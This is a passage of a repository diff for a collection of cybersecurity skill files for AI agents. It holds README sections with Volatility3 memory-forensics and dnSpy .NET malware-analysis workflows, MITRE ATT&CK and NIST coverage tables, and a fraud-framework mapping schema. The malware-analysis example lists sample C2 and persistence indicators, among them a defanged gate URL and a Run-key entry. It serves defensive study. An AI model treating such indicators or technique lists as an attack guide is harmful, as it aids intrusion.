  2. Loads top 3 matches:
     • performing-memory-forensics-with-volatility3
     • hunting-for-credential-dumping-lsass
     • analyzing-windows-event-logs-for-credential-access
  3. Executes the structured Workflow section step-by-step
     → runs Volatility3 plugins, checks LSASS access patterns,
        correlates with event log evidence
  4. Validates results using the Verification section
     → confirms IOCs, maps findings to ATT&CK T1003 (Credential Dumping)
 ```
 **Without these skills**, the agent guesses at tool commands and misses critical steps. **With them**, it follows the same playbook a senior DFIR analyst would use. 
 ## Skill anatomy
 Every skill follows a consistent directory structure:
 ```
 skills/performing-memory-forensics-with-volatility3/
-├── SKILL.md              # Skill definition (YAML frontmatter + Markdown body)
+├── SKILL.md              ← Skill definition (YAML frontmatter + Markdown body)
 │   ├── Frontmatter       #   → name, description, domain, subdomain, tags
 │   ├── When to Use       #   → Trigger conditions for AI agents
 │   ├── Prerequisites     #   → Required tools, access, environment
 │   ├── Workflow           #   → Step-by-step execution guide
 │   └── Verification      #   → How to confirm success
 ├── references/
-│   ├── standards.md      # NIST, MITRE ATT&CK, CVE references
+│   ├── standards.md      ← MITRE ATT&CK, ATLAS, D3FEND, NIST mappings
-│   └── workflows.md      # Deep technical procedure reference
+│   └── workflows.md      ← Deep technical procedure reference
 ├── scripts/
-│   └── process.py        # Practitioner helper scripts
+│   └── process.py        ← Working helper scripts
 └── assets/
-    └── template.md       # Checklists, report templates
+    └── template.md       ← Filled-in checklists and report templates
 ```
-### YAML frontmatter (the discovery layer)
+
 ### YAML frontmatter (real example)
 ```yaml
 ---
 name: performing-memory-forensics-with-volatility3
 description: >-
  Analyze memory dumps to extract running processes, network connections,
  injected code, and malware artifacts using Volatility3 framework.
 domain: cybersecurity
 subdomain: digital-forensics
 tags: [forensics, memory-analysis, volatility3, incident-response, dfir]
 version: "1.0"
 author: mukul975
 license: Apache-2.0
 ---
 ```
 **Required fields:** `name` (kebab-case, 1–64 chars), `description` (keyword-rich for agent discovery), `domain`, `subdomain`, `tags`
 **Optional fields:** `version`, `author`, `license`
 ---
 ## 🗺️ MITRE ATT&CK and NIST CSF 2.0 coverage
 This collection provides **comprehensive coverage** of the two most widely adopted cybersecurity frameworks in the industry.
 ### MITRE ATT&CK Enterprise
 All **14 Enterprise tactics** are covered, with skills mapped to **200+ individual techniques**:
 | Tactic | Coverage | Example skills |
 |:-------|:--------:|:---------------|
 | Reconnaissance | ✅ | OSINT gathering, domain enumeration, social engineering recon |
 | Resource Development | ✅ | Infrastructure profiling, certificate analysis |
 | Initial Access | ✅ | Phishing analysis, exploit detection, supply chain review |
 | Execution | ✅ | Script analysis, command-line forensics, scheduled task audit |
 | Persistence | ✅ | Registry analysis, startup item review, implant detection |
 | Privilege Escalation | ✅ | Token manipulation detection, UAC bypass analysis |
 | Defense Evasion | ✅ | Process injection detection, obfuscation analysis |
 | Credential Access | ✅ | Credential dumping detection, Kerberoasting defense |
 | Discovery | ✅ | Network scanning detection, AD enumeration monitoring |
 | Lateral Movement | ✅ | Pass-the-hash detection, RDP abuse monitoring |
 | Collection | ✅ | Data staging detection, screen capture forensics |
 | Command and Control | ✅ | C2 beaconing detection, DNS tunneling analysis |
 | Exfiltration | ✅ | Data transfer monitoring, covert channel detection |
 | Impact | ✅ | Ransomware response, data destruction forensics |
 ### NIST CSF 2.0 alignment
 Every skill maps to one or more **NIST Cybersecurity Framework 2.0** functions:
 - **Identify (ID)** — Asset management, risk assessment, governance skills
 - **Protect (PR)** — Access control, awareness training, data security skills
 - **Detect (DE)** — Anomaly detection, continuous monitoring, event analysis skills
 - **Respond (RS)** — Incident response, mitigation, communication skills
 - **Recover (RC)** — Recovery planning, improvement, communication skills
 > An ATT&CK Navigator layer file is included in the v1.0.0 release for visual coverage mapping.
 ---
 ## 🧠 How AI agents use these cybersecurity skills
 Skills use a **progressive disclosure pattern** that minimizes token usage while maximizing agent capability. Here's what happens when you ask your AI agent to "analyze this memory dump for signs of compromise":
 ### Stage 1 · Discovery (~30–50 tokens per skill)
 The agent scans **only YAML frontmatter** across all 734+ skills. Each scan costs ~30–50 tokens — the entire collection can be indexed for under 40K tokens. The agent matches your task against `name`, `description`, `subdomain`, and `tags` fields to find relevant skills.
 ```yaml
 # Agent reads ONLY this:
 name: performing-memory-forensics-with-volatility3
 description: Analyze memory dumps to extract processes, network connections, and malware artifacts using Volatility3.
 subdomain: digital-forensics
 tags: [forensics, memory-analysis, volatility3, incident-response]
 ```
 ### Stage 2 · Full workflow load (~200–500 tokens)
 Once a skill matches, the agent loads the **complete `SKILL.md` body** — trigger conditions, prerequisites, step-by-step workflow, and verification checks. This gives the agent a structured playbook to follow.
 ### Stage 3 · Deep reference access (on demand)
 For complex tasks, the agent pulls in **supporting files** from `references/`, `scripts/`, and `assets/` — NIST standards mappings, detailed technical procedures, helper scripts, and report templates. These files are loaded only when the agent needs deeper context.
 > **Result:** Irrelevant skills cost ~30 tokens. Relevant skills provide complete, structured, expert-level guidance. No wasted context window.
 ---
 ## 📝 Example cybersecurity skills
 <details>
 <summary><b>🔍 Memory forensics with Volatility3</b> — DFIR domain</summary>
 ````yaml
 ---
 name: performing-memory-forensics-with-volatility3
 description: >-
  Analyze memory dumps to extract running processes, network connections,
  injected code, and malware artifacts using the Volatility3 framework.
 domain: cybersecurity
 subdomain: digital-forensics
 tags: [forensics, memory-analysis, volatility3, incident-response, dfir]
-version: "1.0"
+atlas_techniques: [AML.T0047]
 d3fend_techniques: [D3-MA, D3-PSMD]
 nist_ai_rmf: [MEASURE-2.6]
 nist_csf: [DE.CM-01, RS.AN-03]
 version: "1.2"
 author: mukul975
 license: Apache-2.0
 ---
 ```
 ### Markdown body sections
 ```markdown
 ## When to Use
-
+Trigger conditions — when should an AI agent activate this skill?
 - Incident responder needs to analyze a memory dump from a compromised host
 - Investigating potential malware infection or lateral movement
 - Extracting indicators of compromise (IOCs) from volatile memory
 - Identifying injected code, hidden processes, or rootkit activity
 - Memory dump file (.raw, .mem, .dmp, .vmem) is available for analysis
 ## Prerequisites
-
+Required tools, access levels, and environment setup.
 - **Volatility3** installed (`pip install volatility3`)
 - Memory dump file acquired from target system
 - **Python 3.8+** runtime environment
 - Symbol tables for target OS (auto-downloaded by Volatility3)
 - Sufficient disk space for analysis output (~2x memory dump size)
 ## Workflow
-
+Step-by-step execution guide with specific commands and decision points.
 ### Step 1 — Identify the operating system profile
 Run the banner and `windows.info` (or `linux.info` / `mac.info`) plugin to
 auto-detect the OS version and confirm the dump is valid:
 ```bash
 vol -f memory.raw windows.info
 ```
 ### Step 2 — List running processes
 Extract the process tree to identify suspicious or unexpected processes:
 ```bash
 vol -f memory.raw windows.pslist
 vol -f memory.raw windows.pstree
 vol -f memory.raw windows.psscan    # Finds hidden/unlinked processes
 ```
 Look for: unusual parent-child relationships, processes with suspicious names,
 processes running from temp directories, unsigned executables.
 ### Step 3 — Analyze network connections
 Extract active and closed network connections:
 ```bash
 vol -f memory.raw windows.netscan
 vol -f memory.raw windows.netstat
 ```
 Flag: connections to known-bad IPs, unusual ports (4444, 8443, 1337),
 beaconing patterns, connections from non-browser processes.
 ### Step 4 — Detect code injection
 Scan for injected code in process memory:
 ```bash
 vol -f memory.raw windows.malfind
 ```
 Review output for: PAGE_EXECUTE_READWRITE memory regions, MZ headers in
 non-image regions, shellcode signatures, hollow process indicators.
 ### Step 5 — Extract artifacts
 Dump suspicious processes, DLLs, and drivers for further analysis:
 ```bash
 vol -f memory.raw windows.dumpfiles --pid <PID>
 vol -f memory.raw windows.dlllist --pid <PID>
 vol -f memory.raw windows.handles --pid <PID>
 ```
 ### Step 6 — Check persistence mechanisms
 Examine registry hives and services loaded in memory:
 ```bash
 vol -f memory.raw windows.registry.hivelist
 vol -f memory.raw windows.svcscan
 vol -f memory.raw windows.cmdline
 ```
 ## Verification
 How to confirm the skill was executed successfully.
 ```
- [ ] OS profile correctly identified and dump validated
+Frontmatter fields: `name` (kebab-case, 1–64 chars), `description` (keyword-rich for agent discovery), `domain`, `subdomain`, `tags`,  `atlas_techniques` (MITRE ATLAS IDs), `d3fend_techniques` (MITRE D3FEND IDs), `nist_ai_rmf` (NIST AI RMF references), `nist_csf` (NIST CSF 2.0 categories).  MITRE ATT&CK technique mappings are documented in each skill's `references/standards.md` file and in the ATT&CK Navigator layer included with releases. 
- [ ] Complete process tree exported and anomalies flagged
+
- [ ] Network connections reviewed and suspicious IPs documented
+<details>
- [ ] Malfind output reviewed — injected code regions identified
+<summary><strong>📊 MITRE ATT&CK Enterprise coverage — all 14 tactics</strong></summary>
- [ ] Suspicious binaries dumped for downstream malware analysis
+
- [ ] IOCs extracted (IPs, domains, file hashes, mutex names)
+&nbsp;
- [ ] Findings documented in incident report with timestamps
+
-````
+| Tactic | ID | Coverage | Key skills |
 |---|---|---|---|
 | Reconnaissance | TA0043 | Strong | OSINT, subdomain enumeration, DNS recon |
 | Resource Development | TA0042 | Moderate | Phishing infrastructure, C2 setup detection |
 | Initial Access | TA0001 | Strong | Phishing simulation, exploit detection, forced browsing |
 | Execution | TA0002 | Strong | PowerShell analysis, fileless malware, script block logging |
 | Persistence | TA0003 | Strong | Scheduled tasks, registry, service accounts, LOTL |
 | Privilege Escalation | TA0004 | Strong | Kerberoasting, AD attacks, cloud privilege escalation |
 | Defense Evasion | TA0005 | Strong | Obfuscation, rootkit analysis, evasion detection |
 | Credential Access | TA0006 | Strong | Mimikatz detection, pass-the-hash, credential dumping |
 | Discovery | TA0007 | Moderate | BloodHound, AD enumeration, network scanning |
 | Lateral Movement | TA0008 | Strong | SMB exploits, lateral movement detection with Splunk |
 | Collection | TA0009 | Moderate | Email forensics, data staging detection |
 | Command and Control | TA0011 | Strong | C2 beaconing, DNS tunneling, Cobalt Strike analysis |
 | Exfiltration | TA0010 | Strong | DNS exfiltration, DLP controls, data loss detection |
 | Impact | TA0040 | Strong | Ransomware defense, encryption analysis, recovery |
 An **ATT&CK Navigator layer file** is included in the [v1.0.0 release assets](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.0.0) for visual coverage mapping. 
 > **Note:** ATT&CK v19 lands April 28, 2026 — splitting Defense Evasion (TA0005) into two new tactics: *Stealth* and *Impair Defenses*.  Skill mappings will be updated in a forthcoming release.
 </details>
 <details>
-<summary><b>🦠 Reverse engineering .NET malware with dnSpy</b> — Malware Analysis domain</summary>
+<summary><strong>📊 NIST CSF 2.0 alignment — all 6 functions</strong></summary>
-````yaml
+&nbsp;
 ---
 name: analyzing-dotnet-malware-with-dnspy
 description: >-
  Decompile, analyze, and extract IOCs from .NET-based malware samples
  using dnSpy for static analysis and behavioral understanding.
 domain: cybersecurity
 subdomain: malware-analysis
 tags: [malware, reverse-engineering, dotnet, dnspy, static-analysis]
 version: "1.0"
 author: mukul975
 license: Apache-2.0
 ---
-## When to Use
+| Function | Skills | Examples |
 |---|---|---|
 | **Govern (GV)** | 30+ | Risk strategy, policy frameworks, roles & responsibilities |
 | **Identify (ID)** | 120+ | Asset discovery, threat landscape assessment, risk analysis |
 | **Protect (PR)** | 150+ | IAM hardening, WAF rules, zero trust, encryption |
 | **Detect (DE)** | 200+ | Threat hunting, SIEM correlation, anomaly detection |
 | **Respond (RS)** | 160+ | Incident response, forensics, breach containment |
 | **Recover (RC)** | 40+ | Ransomware recovery, BCP, disaster recovery |
- Triaging a suspected .NET malware sample (.exe or .dll compiled with CLR)
+NIST CSF 2.0 (February 2024) added the **Govern** function  and expanded scope from critical infrastructure to all organizations.  Skill mappings align to all 22 categories and reference 106 subcategories. 
 - Extracting hardcoded C2 URLs, encryption keys, or configuration data
 - Understanding malware behavior before dynamic analysis
 - Analyzing obfuscated .NET payloads (ConfuserEx, SmartAssembly, etc.)
 - Building detection signatures (YARA, Sigma) from decompiled source
 ## Prerequisites
 - **dnSpy** (or dnSpyEx fork) installed on analysis workstation
 - Isolated malware analysis environment (VM with snapshots)
 - **PE analysis tool** (CFF Explorer, PE-bear, or pestudio) for initial triage
 - **de4dot** for automated .NET deobfuscation
 - Sample SHA256 hash documented before analysis begins
 - Network monitoring tools (Wireshark/FakeNet-NG) for dynamic validation
 ## Workflow
 ### Step 1 — Initial triage and environment setup
 Confirm the sample is a .NET assembly before opening in dnSpy:
 ```bash
 # Check for CLR metadata
 file sample.exe
 # Look for .NET version string, mscoree.dll import
 pestudio sample.exe
 ```
 Take a VM snapshot. Disable network adapters. Document sample hash.
 ### Step 2 — Deobfuscate if protected
 Many .NET malware families use obfuscation. Run de4dot first:
 ```bash
 de4dot sample.exe -o sample_clean.exe
 ```
 Check output log for identified obfuscator (ConfuserEx, Dotfuscator,
 SmartAssembly, Babel, Eazfuscator). If de4dot fails, note the packer
 for manual unpacking in dnSpy.
 ### Step 3 — Load and explore in dnSpy
 Open the cleaned binary in dnSpy. Start with high-level reconnaissance:
 1. **Assembly Explorer** — Review namespaces, classes, entry point
 2. **Entry point** (`Main()` or module initializer) — Trace execution flow
 3. **Resources** — Check for embedded payloads, encrypted configs
 4. **String references** — Search for URLs, IP addresses, registry keys
 5. **References** — Note any P/Invoke calls (Win32 API) indicating native interaction
 ### Step 4 — Identify C2 infrastructure and configuration
 Search decompiled source for network indicators:
 - Hardcoded URLs, IP addresses, domain names
 - Base64-encoded strings (decode in CyberChef)
 - XOR / AES decryption routines with embedded keys
 - HTTP User-Agent strings, custom headers
 - Registry keys or file paths used for persistence
 Set breakpoints in dnSpy debugger at decryption functions to capture
 plaintext config at runtime if static extraction fails.
 ### Step 5 — Map capabilities to MITRE ATT&CK
 Document each observed capability:
 - **Execution method** — Process injection, scheduled tasks, WMI
 - **Persistence** — Registry Run keys, startup folder, services
 - **Credential access** — Browser credential theft, keylogging
 - **Exfiltration** — HTTP POST, DNS tunneling, cloud storage APIs
 - **Evasion** — Anti-VM checks, sleep timers, sandbox detection
 ### Step 6 — Extract IOCs and build detections
 Compile all indicators into a structured IOC list:
 ```
 # Network IOCs
 C2: https://evil-domain[.]com/gate.php
 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0)
 DNS: ns1.malware-c2[.]net
 # Host IOCs
 Mutex: Global\{GUID-HERE}
 Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost
 File: %APPDATA%\svchost.exe (SHA256: abc123...)
 ```
 Write YARA rule targeting unique strings or byte patterns.
 ## Verification
 - [ ] Sample identified as .NET assembly and hash documented
 - [ ] Deobfuscation attempted — obfuscator identified and handled
 - [ ] Entry point traced — full execution flow mapped
 - [ ] C2 infrastructure extracted (URLs, IPs, domains, ports)
 - [ ] Encryption keys / decryption routines documented
 - [ ] Capabilities mapped to MITRE ATT&CK techniques
 - [ ] IOC list exported in structured format (STIX, OpenIOC, or CSV)
 - [ ] YARA detection rule written and tested against sample
 ````
 </details>
---
+<details>
 <summary><strong>📊 Framework deep dive — ATLAS, D3FEND, AI RMF</strong></summary>
-## 👥 Contributors
+&nbsp;
-Thanks to these wonderful people for building the largest open-source cybersecurity skills collection:
+### MITRE ATLAS v5.4 — AI/ML adversarial threats
 ATLAS maps adversarial tactics, techniques, and case studies specific to AI and machine learning systems. Version 5.4 covers **16 tactics and 84 techniques** including agentic AI attack vectors added in late 2025: AI agent context poisoning, tool invocation abuse, MCP server compromises, and malicious agent deployment.  Skills mapped to ATLAS help agents identify and defend against threats to ML pipelines, model weights, inference APIs, and autonomous workflows. 
-<!-- ALL-CONTRIBUTORS-LIST:START -->
+### MITRE D3FEND v1.3 — Defensive countermeasures
-<table>
+D3FEND is an NSA-funded knowledge graph of **267 defensive techniques** organized across 7 tactical categories: Model, Harden, Detect, Isolate, Deceive, Evict, and Restore.  Built on OWL 2 ontology, it uses a shared Digital Artifact layer to bidirectionally map defensive countermeasures to ATT&CK offensive techniques.  Skills tagged with D3FEND identifiers let agents recommend specific countermeasures for detected threats.
  <tr>
    <td align="center">
      <a href="https://github.com/mukul975">
        <img src="https://avatars.githubusercontent.com/u/42860185?v=4" width="100px;" alt="mukul975" /><br />
        <sub><b>mukul975</b></sub>
      </a><br />
      💻 📖 🚧 🎨
    </td>
    <td align="center">
      <a href="https://github.com/Systech2021-1952">
        <img src="https://avatars.githubusercontent.com/u/151213461?v=4" width="100px;" alt="Systech2021-1952" /><br />
        <sub><b>Systech2021-1952</b></sub>
      </a><br />
      💻 🌍
    </td>
  </tr>
 </table>
 <!-- ALL-CONTRIBUTORS-LIST:END -->
-Want to see your name here? Check out the [contributing guide](#-contributing-to-cybersecurity-ai-skills) below.
+### NIST AI RMF 1.0 + GenAI Profile (AI 600-1)
 The AI Risk Management Framework defines 4 core functions — Govern, Map, Measure, Manage — with **72 subcategories** for trustworthy AI development.  The GenAI Profile (AI 600-1, July 2024) adds **12 risk categories** specific to generative AI, from confabulation and data privacy to prompt injection and supply chain risks.  Colorado's AI Act (effective February 2026) provides a **legal safe harbor** for organizations complying with NIST AI RMF, making these mappings directly relevant to regulatory compliance.
 </details>
 ## Compatible platforms
 **AI code assistants**
 Claude Code (Anthropic) · GitHub Copilot (Microsoft) · Cursor · Windsurf · Cline · Aider · Continue · Roo Code · Amazon Q Developer · Tabnine · Sourcegraph Cody · JetBrains AI 
 **CLI agents**
 OpenAI Codex CLI · Gemini CLI (Google) 
 **Autonomous agents**
 Devin · Replit Agent · SWE-agent · OpenHands 
 **Agent frameworks & SDKs**
 LangChain · CrewAI · AutoGen · Semantic Kernel · Haystack · Vercel AI SDK · Any MCP-compatible agent 
 All platforms that support the [agentskills.io](https://agentskills.io) standard can load these skills with zero configuration. 
 ## What people are saying
 > *"A database of real, organized security skills that any AI agent can plug into and use. Not tutorials. Not blog posts."* 
 > — **[Hasan Toor (@hasantoxr)](https://x.com/hasantoxr/status/2033193922349179249)**, AI/tech creator
 > *"This is not a random collection of security scripts. It's a structured operational knowledge base designed for AI-driven security workflows."* 
 > — **[fazal-sec](https://fazal-sec.medium.com/claude-skills-ai-powered-cybersecurity-the-complete-guide-to-building-intelligent-security-7bb7e9d14c8e)**,  Medium
 ## Featured in
 | Where | Type | Link |
 |---|---|---|
 | **awesome-agent-skills** | Awesome List (1,000+ skills index) | [VoltAgent/awesome-agent-skills](https://github.com/VoltAgent/awesome-agent-skills) |
 | **awesome-ai-security** | Awesome List (AI security tools) | [ottosulin/awesome-ai-security](https://github.com/ottosulin/awesome-ai-security) |
 | **awesome-codex-cli** | Awesome List (Codex CLI resources) | [RoggeOhta/awesome-codex-cli](https://github.com/RoggeOhta/awesome-codex-cli) |
 | **SkillsLLM** | Skills directory & marketplace | [skillsllm.com/skill/anthropic-cybersecurity-skills](https://skillsllm.com/skill/anthropic-cybersecurity-skills) |
 | **Openflows** | Signal analysis & tracking | [openflows.org](https://openflows.org/currency/currents/anthropic-cybersecurity-skills/) |
 | **NeverSight skills_feed** | Automated skills index | [NeverSight/skills_feed](https://github.com/NeverSight/skills_feed) |
 ## Star history
 <a href="https://star-history.com/#mukul975/Anthropic-Cybersecurity-Skills&Date">
 <picture>
   <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=mukul975/Anthropic-Cybersecurity-Skills&type=Date&theme=dark" />
   <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=mukul975/Anthropic-Cybersecurity-Skills&type=Date" />
   <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=mukul975/Anthropic-Cybersecurity-Skills&type=Date" width="100%" />
 </picture>
 </a>
 ## Releases
 | Version | Date | Highlights |
 |---|---|---|
 | [v1.0.0](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.0.0) | March 11, 2026 | 734 skills · 26 domains · MITRE ATT&CK + NIST CSF 2.0 mapping · ATT&CK Navigator layer |
 Skills have continued to grow on `main` since v1.0.0 — the library now contains **817 skills** with **6-framework mapping**  (MITRE ATLAS, D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework added post-release).  Check [Releases](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases) for the latest tagged version.
 ## Contributing
 This project grows through community contributions. Here is how to get involved:
 **Add a new skill** — Domains like Deception Technology (2 skills) and Compliance & Governance (5 skills) need the most help. Follow the template in [CONTRIBUTING.md](CONTRIBUTING.md) and submit a PR with the title `Add skill: your-skill-name`.
 **Improve existing skills** — Add framework mappings, fix workflows, update tool references, or contribute scripts and templates.
 **Report issues** — Found an inaccurate procedure or broken script? [Open an issue](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues).
 Every PR is reviewed for technical accuracy and agentskills.io standard compliance within 48 hours.  Check [good first issues](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22) for a starting point.
 This project follows the [Contributor Covenant](https://www.contributor-covenant.org/). By participating, you agree to uphold this code. 
 ## Community
 💬 [Discussions](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/discussions) — Questions, ideas, and roadmap conversations
 🐛 [Issues](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues) — Bug reports and feature requests
 🔒 [Security Policy](SECURITY.md) — Responsible disclosure process (48-hour acknowledgment) 
 ## Citation
 If you use this project in research or publications:
 ```bibtex
@software{anthropic_cybersecurity_skills,
  author       = {Jangra, Mahipal},
  title        = {Anthropic Cybersecurity Skills},
  year         = {2026},
  url          = {https://github.com/mukul975/Anthropic-Cybersecurity-Skills},
  license      = {Apache-2.0},
  note         = {817 structured cybersecurity skills for AI agents,
                  mapped to MITRE ATT\&CK, NIST CSF 2.0, MITRE ATLAS,
                  MITRE D3FEND, and NIST AI RMF}
 }
 ```
 ## License
 This project is licensed under the [Apache License 2.0](LICENSE). You are free to use, modify, and distribute these skills in both personal and commercial projects. 
 ---
-## 🤝 Contributing to cybersecurity AI skills
+<div align="center">
-This project hit **3.5k stars in two weeks** — the community momentum is real. With **328 forks**, **9 open PRs**, and security professionals from around the world getting involved, now is the perfect time to contribute.
+**If this project helps your security work, consider giving it a ⭐**
-We welcome four types of contributions:
+[⭐ Star](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers) · [🍴 Fork](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/fork) · [💬 Discuss](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/discussions) · [📝 Contribute](CONTRIBUTING.md)
-| Type | Description | Good for |
+Community project by [@mukul975](https://github.com/mukul975). Not affiliated with Anthropic PBC.
 |:-----|:------------|:---------|
 | 🆕 **New skills** | Add skills for uncovered techniques or domains | Security practitioners, pen testers, IR analysts |
 | 📖 **Improve existing skills** | Enhance workflows, add edge cases, fix errors | Anyone who uses the skills and spots improvements |
 | 🌍 **Translations & i18n** | Help make skills accessible to non-English speakers | Multilingual security professionals |
 | 🐛 **Bug reports & feedback** | Report issues, suggest improvements, review PRs | Everyone — all experience levels welcome |
-### How to get started
+</div>
 1. **Browse [open issues](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues)** — look for `good first issue` and `help wanted` labels
 2. **Read [`CONTRIBUTING.md`](CONTRIBUTING.md)** for the full skill template and submission guidelines
 3. **Fork the repo**, create your skill directory under `skills/`, and submit a PR
 4. **Title format:** `Add skill: your-skill-name-here`
 > Every PR gets reviewed for technical accuracy and consistency with the agentskills.io standard. We aim to review within 48 hours.
 ---
 ## ⭐ Star history
 [![Star History Chart](https://api.star-history.com/svg?repos=mukul975/Anthropic-Cybersecurity-Skills&type=Date)](https://star-history.com/#mukul975/Anthropic-Cybersecurity-Skills&Date)
 ---
 ## 🌐 Community
 <p align="center">
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers">⭐ Star this repo</a> ·
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/fork">🍴 Fork it</a> ·
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/discussions">💬 Discuss</a> ·
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues/new">📝 Open an issue</a>
 </p>
 If this project saves you time or makes your AI agent more capable, **give it a ⭐** — it helps others discover these skills and keeps the community growing.
 ---
 ## 📄 License
 This project is licensed under the **Apache License 2.0** — see the [`LICENSE`](LICENSE) file for details.
 You are free to use, modify, and distribute these skills in both personal and commercial projects. Attribution is appreciated but not required.
 ---
 <p align="center">
  <sub>
    <b>⚠️ Disclaimer:</b> This is an independent, community-created project. <b>Not affiliated with Anthropic PBC.</b><br/>
    "Anthropic" in the repository name refers to compatibility with the <a href="https://agentskills.io">agentskills.io</a> open standard,<br/>
    not official Anthropic endorsement or affiliation. All trademarks belong to their respective owners.
  </sub>
 </p>
@@ -0,0 +1,93 @@
 # MITRE Fight Fraud Framework (F3) — Mapping Schema
 This repository maps fraud-relevant skills to the **MITRE Fight Fraud Framework (F3)**,
 released April 9, 2026 by MITRE's Center for Threat-Informed Defense (CTID). F3 is an
 ATT&CK-compatible TTP catalog for cyber-enabled financial fraud.
 - Upstream project: <https://ctid.mitre.org/fraud/>
 - Source repo: <https://github.com/center-for-threat-informed-defense/fight-fraud-framework>
 - License: Apache-2.0
 - Mapped version in this repo: **F3 v1.1**
 ## Why F3 in addition to ATT&CK
 ATT&CK collapses post-compromise fraud into the single `T1657` (Financial Theft)
 technique. F3 decomposes the "how a cyber intrusion becomes a financial loss" stages
 into two dedicated tactics that ATT&CK does not have:
 - **Positioning** (`FA0001`) — after access, collect/manipulate data and prepare the fraud.
 - **Monetization** (`FA0002`) — convert stolen assets into usable funds.
 So `mitre_attack` answers "how did the adversary get in / operate technically" and
 `mitre_f3` answers "how did that turn into money." They are kept as **separate
 frontmatter blocks** because F3 redefines several ATT&CK tactics for the fraud context.
 ## The 8 F3 v1.1 tactics
 | Tactic slug | F3 ID | Origin |
 |---|---|---|
 | `reconnaissance` | TA0043 | ATT&CK (redefined) |
 | `resource-development` | TA0042 | ATT&CK (redefined) |
 | `initial-access` | TA0001 | ATT&CK (redefined) |
 | `stealth` | TA0005 | ATT&CK (redefined) |
 | `positioning` | **FA0001** | **F3-new** |
 | `execution` | TA0002 | ATT&CK (redefined) |
 | `monetization` | **FA0002** | **F3-new** |
 | `defense-impairment` | TA0112 | ATT&CK (redefined) |
 ## Technique ID conventions
 - **`F1XXX`** — fraud-specific techniques introduced by F3 (e.g. `F1005.003`
  Account Manipulation: Add Beneficiary, `F1025.003` Electronic Funds Transfer:
  Wire Transfer, `F1018` Convert to Cryptocurrency).
 - **`T1XXX`** — ATT&CK techniques reused verbatim inside F3 (e.g. `T1566` Phishing,
  `T1586` Compromise Accounts, `T1557` Adversary-in-the-Middle).
 - Sub-techniques use ATT&CK dot notation (`F1005.003`, `T1566.002`).
 Every ID used in this repo is a real, active technique present in the F3 v1.1 STIX
 bundle — there are no `TBD`/placeholder IDs.
 ## Frontmatter schema
 The `mitre_f3` block sits alongside the existing `mitre_attack` block:
 ```yaml
 mitre_f3:
  version: '1.1'
  tactics:
    - positioning
    - monetization
  techniques:
    - id: F1005.003
      name: 'Account Manipulation: Add Beneficiary'
      tactic: positioning
      source: f3          # F-prefixed = fraud-specific
    - id: T1586
      name: Compromise Accounts
      tactic: resource-development
      source: attack      # T-prefixed = reused ATT&CK
 ```
 Rules:
 1. `id` must be a real F3 v1.1 technique ID.
 2. `name` must match the technique's official name in the F3 catalog.
 3. `tactic` must be one the technique actually lists in the catalog.
 4. `source` is `f3` for `F1XXX` IDs and `attack` for `T1XXX` IDs.
 ## Scope
 F3 mappings are applied only to **fraud-relevant skills** — phishing/social
 engineering, account takeover, banking malware/stealers, BEC, identity/KYC,
 payment/card fraud, money-mule/cash-out, ransomware extortion, and the cross-cutting
 DFIR and threat-intelligence skills. Skills with no fraud dimension do not carry an
 `mitre_f3` block.
 ## Regenerating / verifying the catalog
 ```bash
 git clone --depth 1 https://github.com/center-for-threat-informed-defense/fight-fraud-framework
 # technique catalog is the STIX bundle:
 #   fight-fraud-framework/public/f3-stix-v1.1.json
 ```
 All `mitre_f3` IDs in this repo are validated against that bundle on every update.
@@ -1,6 +1,6 @@
 # ATT&CK Coverage Summary
-Coverage analysis of the 607 cybersecurity skills mapped to MITRE ATT&CK Enterprise v15 tactics.
+Coverage analysis of the 753 cybersecurity skills mapped to MITRE ATT&CK Enterprise v15 tactics.
 ## Tactic Coverage Matrix
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
